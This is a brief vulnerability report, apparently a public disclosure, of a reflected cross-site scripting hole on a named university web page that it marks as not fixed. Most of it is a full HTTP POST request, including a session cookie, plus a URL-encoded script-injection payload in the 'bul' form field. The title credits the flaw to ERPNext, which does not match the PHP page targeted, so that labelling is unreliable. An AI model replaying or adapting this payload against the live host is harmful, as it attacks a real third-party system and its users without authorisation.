Name: lidya.hacettepe.edu.tr Cross-site Scripting Vulnerabilities in ERPNext
Vendor Homepage: lidya.hacettepe.edu.tr
Vulnerability Type: Reflected Cross-site Scripting
Severity: High
Status: Not Fixed

----------------------------------------------------------------------

Request Headers

POST /~ahmett10/bto316/ilac/ilaclar.php HTTP/1.1
Content-Length: 94
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=52hvvq2g6l8qu0slfojti0aub1
Host: lidya.hacettepe.edu.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

----------------------------------------------------------------------

alert here =>

ara=Ara&bul=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28956925%29%3c%2fScRiPt%3e&sec=t_ilac.adi

----------------------------------------------------------------------